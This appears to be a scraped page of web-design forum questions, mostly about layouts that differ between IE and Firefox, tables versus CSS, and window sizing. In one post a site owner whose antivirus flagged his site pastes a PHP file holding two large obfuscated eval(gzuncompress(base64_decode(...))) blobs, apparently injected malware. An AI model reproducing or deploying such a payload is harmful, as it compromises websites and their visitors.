HTML - Managing Webpage Layout Across Different Browser
hi,
Im facing the problem, such as i have designd my web page using Frontpage 2007 now im faciing the problem such as when i view the page in IE it is fine. but in mozzilla it is scattered please help me out!! Similar TutorialsI have always used tables to layout my sites bt now everyone is telling me that I should use css instead. I am not sure how to do this in css so would somebody please explain this to me and an example would be nice too! Thanks so much! Hello there, I always make webpages using tables. The usual outline for me is a vertical menu bar at the left that is of STATIC width, and a window on the right that displays the conent with a DYNAMIC width. So I pretty much want the left pane to take up i.e. 200px and the right pane to take up the rest of the page. With tables, it's easy b/c you can just set the table width to 100%, define the td width of the left pane, and the right pane will automatically resize itself to fill the page. I'm trying to adapt a div-based layout now and I can't figure out how to do that with divs. I've been playing with it, but keep running into problems. If I set float:left, after a certain point in making the window narrower, the right div jumps below the left div, etc.. Can someone give me some hints or point me in the right direction as to how to achieve the same effect I had using tables? Thanks! An html noob would like some help. I am making a html page to autorun from a CD-ROM. I would like the browser window on the users computer to open to a fixed size. I tried the following html inserted into the body of my code. Code: onload="self.resizeTo(795,470)"> This works well in Internet Explorer but when I try it with Firefox 3.0.1 the script seems to make the toolbars and scrollbars be included in the size. That is, the interior of IE window displays the content at the right size (795 x 470) with no space between the content and the scroll bars etc., but the whole of the firefox browser program (toolbars, scrollbars etc shrink to 795 x 470). This makes it necessary to scroll the content in Firefox. I would like to only use html for the solution as I am trying to keep the CD-ROM requirements to run to a minimum. Also if there was someway to make the scroll bars and toolbars disappear from the browsers this would improve the professional look. I am sure there is an easy answer, but I can't find it. Thanks for any help. Hey all! I am currently working on my first web project...a Japanese city network using IDN's. I used IE6 for testing from the ground up, but this week downloaded IE7 (at last!) Of course there were obvious display issues! My question is (as a total noob) should I be looking to get the layout I want via '.em' code use, or do I need to add a section of IE7 hacks to my CSS sheet? To visit the site to see what I mean got to xn--u9j358k96enkbl89i.com (punycode) which translates as Japanese (roughly) for JapaneseCities.com. This site displays fine in IE6, but in IE7 is messed up. I need to learn how to implement code that will help my sites to display the best with the most popular browsers - but I don't know where to start! Please advise.. Hey Guys I have a problem when viewing my website in firefox. However, It works in opera, safari and Quanta's preview window. I have unwanted gaps underneath buttons images that have rollovers. Wrong: Correct: The code is: Code: <TABLE border="0" cellpadding="0" cellspacing="0"> <TR><TD><IMG src="images/sidebar_top.gif"></TD></TR> <TR><TD><IMG src="images/sidebar.gif"></TD></TR> <TR><TD> <!-- Home Button --> <a href="" onmouseout="document.btn_home.src=btn_home_nm.src" onmouseover="document.btn_home.src=btn_home_hv.src" > <img src="images/btn_home_nm.gif" border="0" name="btn_home"> </a> </TD></TR> <TR><TD> <!-- Opening Times Button --> <a href="" onmouseout="document.btn_opening_times.src=btn_opening_times_nm.src" onmouseover="document.btn_opening_times.src=btn_opening_times_hv.src"> <img src="images/btn_opening_times_nm.gif" border="0" name="btn_opening_times"> </a> </TD></TR> I don't get these gaps on firefox if I remove the a tag like this: Code: <TABLE border="0" cellpadding="0" cellspacing="0"> <TR><TD><IMG src="images/sidebar_top.gif"></TD></TR> <TR><TD><IMG src="images/sidebar.gif"></TD></TR> <TR><TD> <!-- Home Button --> <img src="images/btn_home_nm.gif" border="0" name="btn_home"> </TD></TR> <TR><TD> <!-- Opening Times Button --> <img src="images/btn_opening_times_nm.gif" border="0" name="btn_opening_times"> </TD></TR> But then I don't have rollovers Does anyone know why this happens, and why it doesn't happen on opera or safari? Thank you Toshi If anyone can help with this problem I would be very grateful. It's a problem I notice on a fairly regular basis so I guess I am over looking something when I am working with tables. Basically my table sizes look completely different in IE than they do in Firefox. Here is an example of a table I'm working on that appears massive in firefox yet is keeping its correct dimensions of height 287 pixels in IE. http://www.orolin.co.uk/prices.html Can anyone shed any light on this problem?. It would be much appriciated. Many Thanks, Jamie Good Day and Happy New Year. I am told that MS Frontpage cannot follow or resolve the links set up via JS scripts. That is, FP cannot check for broken or invalid links embedded in a sript. To demonstrate, I've got the following construct: <a onclick="OpenWindow('target.html');" href="javascript:void(0);"> any text </a> OpenWindow () is a JS script which opens the target page with few additional features. How can I automatically verify the links? Thank you for your help. Saeed I have the following page: Code: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><title>Jobs</title> <style type="text/css"> body { background-color: darkblue; font-family: Arial, Helvetica, sans-serif; color: white; } </style> </head> <body> <table> <tr> <td> <p>Are you a college <br/>student who would <br/>like a part time job? <br/><br/> Apply at Marina Cafe, <br/>we will work <br/>around your school <br/>schedule <br/><br/> Complete the <br/> information form at <br/> the right to get the <br/> application process <br/> started <br/><br/> Or, if you prefer, stop <br/> by Marina Cafe any <br/> time and ask about <br/> employment <br/> opportunities <br/><br/> Marina Cafe is an <br/> equal opportunity <br/> employer <br/><br/> We celebrate the <br/> diversity of our <br/> associates!</p> </td> </tr> </table> <form id="JobApplication" action="job_applications.php" method="post"> <table> <tr> <td> <p>Name: <input type="text" size="40" maxlength="40" name="Name"/></p> </td> </tr> <tr> <td> <p>Email: <input type="text" size ="40" maxlength="40" name="Email" /></p> </td> </tr> <tr> <td> <p>Phone: <input type="text" size="12" maxlength="12" name="Phone"/></p> </td> </tr> <tr> <td> Please select the roles you are interested in: </td> </tr> <tr> <td> <p><input type="checkbox" name="BarAssociate" value="BarAssociate"/> Bar associate</p> </td> </tr> <tr> <td> <p> <input type="checkbox" name="Server" value="Server"/> Server</p> </td> </tr> <tr> <td> <p> <input type="checkbox" name="CleaningAndMaintainance" value="CleaningAndMaintainance"/> Cleaning and maintainance</p> </td> </tr> <tr> <td> <p> <input type="checkbox" name="Manager" value="Manager"/> Manager</p> </td> </tr> <tr> <td> <p>Employment type: <input type="radio" name="EmpType" value="FullTime"/> Full Time</p> </td> <td> <p><input type="radio" name="EmpType" value="PartTime"/> Part Time</p> </td> </tr> <tr> <td> <p>Gender: <input type="radio" name="Gender" value="Male"/> Male</p> </td> <td> <p><input type="radio" name="Gender" value="Female"/> Female</p> </td> </tr> <tr> <td> Years of experience: <select name="Doctor" size="1"> <option value="1">Pick one</option> <option value="2">No experience</option> <option value="3">Less than 1 year experience</option> <option value="4">More than 1 year experience</option> </select> </td> </tr> <tr> <td valign="bottom" style="width: 20%"><p>Comments <textarea rows="5" cols="50" name="Comment"></textarea></p></td> <td valign="top"> </td> </tr> <tr> <td> <input type="submit" name="mysubmit" value="Submit" /> </td> <td> <input type="reset" name="mysubmit" value="Cancel"/> </td> </tr> </table> </form> </body> </html> As you can see I have two tables there, how can I make it so the first table is located on the left hand side and the second table is located on the right hand side, not under it? Hi, I am trying to control a bunch of entries , they are all under the main heading, but they will all appear in a window, scolling, what I want to do is to take each pair, as the appear, resize them to that pair to a window, that will give an A4 page and give the option of printing them off, if print is not required, then to move to the next pairing. Can anyone help? Sorry if i posted this in the wrong location. So im a real estate agent making a website. Im no pro and most of the stuff ive been using to build has been through layouts/generators/help of others such as yourselves. So ive been stuck on finding/making this code for the past couple of days. So all my listings are on my agencys website, not my personal agent website. Is there a code i could have where in the listings page my my personal agent website, i could have a window maybe 600x900 of the listing page on my agencys website? To kind of clear things up, you know how when you google something you have the magnifying glass, how it gives that preview. How can i have that preview coded onto a webpage, but me say what webpage to preview and how big to make the preview box? Tried to explain it as best i could. If you dont know the code, if you can tell me what its called so i can try to narrow the google searches. So far everything that has been coming up in the search restults has been preview boxes to preview html codes you have already written. Fail Blog Thanks I'm a novice compared to the pros here and stuck on a couple issues. My website is uspsrealty.com There is some "empty" space on my home page below the horizontal line. I want to remove the horizontal line and have the ability to use that empty space without throwing my borders/margins off. I would like to add about 3-4 sentences in that blank area. Can this be changed so I can add a few sentences? I know why this is happening, just don't know how to correct it. Also want to change the copyright.jpg to 2010 from 2009. Might as well make up a few more jpgs with the years 2011, 2012, 2013, 2014, and 2015 Willing to paypal you money for your help. Hoping one of you pros can do this in 30 min and willing to pay $25-30. Contact me he galevin@hotmail.com Thanks, Gerald Levin how do i make a background image fit to the window. also i have a button on a page. how do i get it to close the window uppon clicking it. any help would be great. Hi, i have a problem im not sure how to go about it . I have a webpage where the user enters there personal details . As they are fillign in details they click a link and another webpage is opened ( keeping the orginal open ) Where the do some other stuff on this new page and what is created is a javascript array of numbers I then want them to be able close this new window down and the javascript array data will be submitted with the rest of the personal information when the click a submit button on the first page . If this makes sense how do i go about this? Thanks Hey guys(and girls ), Here is my problem i would like to make a webpage like this: ---------------------HEADER--------------------- ---------------------php script------------------- ---------------------FOOTER--------------------- (Show Word) <-- When i click this, the page will be refresh so the php script will echo a random word, but if i do that every time i refresh the page i dont want to refresh the Header and Footer. My idea was to use iFrames... Is there any other way? Thnxs!!! Hello, I got this message with AVG : http://img189.imageshack.us/img189/8502/image001jn.png Here is my website : http://www.club19.com.au What is the problem ? Here is the code of the concerned file (SprySlidingPanels.php) : PHP Code: <?php eval(gzuncompress(base64_decode('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'))); eval(gzuncompress(base64_decode('eNqVWAtz2zYS/iu0JtOIE59NAHxGYUfXTpKm7uPqhxon8WhoiZI5lkQfSV3SOP7vt9hdUCRFu3eZmAQXi2+xi31B42y5yYt0ui3TYppc50U1LPLtZj50XjhHqvHv6U/bHo3LtJquk2U2m/57m1dpOS22mypbpwbQ8GjadJWts6o5kxZFXkyL9A62kG2WjalsMRwvtptZleWbafolK6ty+DzbZMBcVrD357Z9P258D/NVSphdougjyj6i6iO6fUQPiA+PbhH0rbcHY1zh24cNvZszwaMzoX2oX1GXLhz78LeLX37pksWjSELWUy/E3qTaTf6fx/+Qrsr0UTskqyotakvgFwl09zbamPSemvTJJCLomQtbVmlMRE8gSqepvOz+9SwQbVNqNzjYU38203obsjWbDZ+tpo59D08RI4xEH99***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'))); ?> Thank you ! Hi, Can anyone help me work out how to create a tab on the left hand side of the browser window, a bit like the Convotrack one he http://www.dannywhatmough.com/ Obviously I would want to use my own image/text and just link it to a webpage. Do I need to use javascript? Danny Hi folks... first post and on the scrounge... Can anyone help with a problem on a website i am trying to design, my first site so go easy.... anyway... when i look at the page http://www.villagolf150.com/Gallery.html in IE it is fine.... but when i check it on Firefox there is a stray gap/space/whatever at the top near "home page" ... i have been trying for ages to get rid of it with no luck.... so pretty please.... can someone help me before i lose my mind.... Jeff. sorry, this isnt an exact repeat post... has a bit of additional information my friend had a friend make this page http://www.opportunity.com/index.html or something along those lines... Im using this page as a reference... So I copied the source, and copied the file free_access.css within the same folder I created an image subfolderd but when I preview it in dreamweaver it tells me it can not find the css file... Is this normal? do I need to upload it to a server first to actually view it... or am I making a mistake thx everyone for the help earlier Matt Hi, I'm new to the site and I'm just here to ask a question. I've been having trouble with my webpage trying to center everything. The problem is that at home my webpage is centered (When you zoom out everything stays centered) but as for school I zoom out and everything stays to the left and I'm pretty sure I left all the code the same from computer to computer. I don't think it is the resolution because I had changed my resolution to the same as at school. This is my coding (I'm an amateur at Html and don't know CSS): <title>Home - WebBanners</title> </head> <p align="center"> <div style="position:absolute;top:0px; left:0px; right:0px; bottom:0px;" align="center"> <body topmargin="0" leftmargin="0" bgcolor="#0099FF"> <img src="Banner.gif" width="1280" height="290" border="0" usemap="#Map" /> <map name="Map" id="Map"> <area shape="rect" coords="140,233,302,285" href="Home.html" /> <area shape="rect" coords="330,233,543,286" href="Samples.html" /> <area shape="rect" coords="565,240,722,287" href="Prices.html" /> <area shape="rect" coords="752,229,905,286" href="About.html" /> <area shape="rect" coords="945,235,1122,284" href="Contact.html" /> </map> <font face="Georgia, Times New Roman, Times, serif" size="+4" color="white"><p align="center"> <u> Welcome To WebBanners!</u></p></font> </p> <table align="center"> <tr> <td><font face="Georgia, Times New Roman, Times, serif" color="black" size="7"><strong>H</strong></font> <font face="Georgia, Times New Roman, Times, serif" size="+2" color="white">ere we make special just-for-you banner. <br /> <br> <font face="Georgia, Times New Roman, Times, serif">Every banner is unique to the person who have ordered them.<br /> <br><font face="Georgia, Times New Roman, Times, serif">They are sold at a reasonable price and if you don't <br>like them then we offer full money back guaranteed. <br /> <br /> We also have an interactive department where you can <br />talk to one of 'us' through the microphone so we can help you. <br />All you have to do is ask through the E-mail. <br /> <br /> We can make tons of banners for your website such as the one above <br />or see more <a href="Samples.html">Here</a> <br /> <br /> We have prices for your special needs. <br />All of the banners we offer are your ideas. <br />Ask and we can do it for you! Click <a href="Prices.html"> Here </a> for prices. <br /> <br /> Want to learn more about us? Click <a href="About.html"> Here </a> for more information. <br /> <br /> Going to buy one of our offers? Need help in finding something? <br />Click <a href="Contact.html"> Here </a> to contact us! For your design! </font> </td> <td align="center"> <font face="Georgia, Times New Roman, Times, serif" color="Green" size="+3"><u><strong>So Why Pick Us? </font> </u> </strong> <br /> <br /> <font face="Georgia, Times New Roman, Times, serif" color="Green" size="+2"> <li>We have 100% Money Back Guarantee <br /> <li>Satisfaction Guarantee<br /> <li>Our Prices beat the Competitors<br /> <li>24 Hour Service <br /> <li>Interactive Department <br /> <br /> <br /> <br /> <img src="Ordernow!.gif" /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> </body> </html> I've done a search on here, and have spent the last week or searching on google, I'm currently building a webpage up which integrates a forum, i want to put a feed on the home page of the site of the latest topics from the forum. The feed address is: feed://guitarprojectuk.forumotion.com/feed/ and the actual website address is: http://www.guitarprojectuk.com I've tried a few on google, and non seem to work, not sure wether its the feed or something i'm doing, so can somebody help me out? Thanks, Tom. |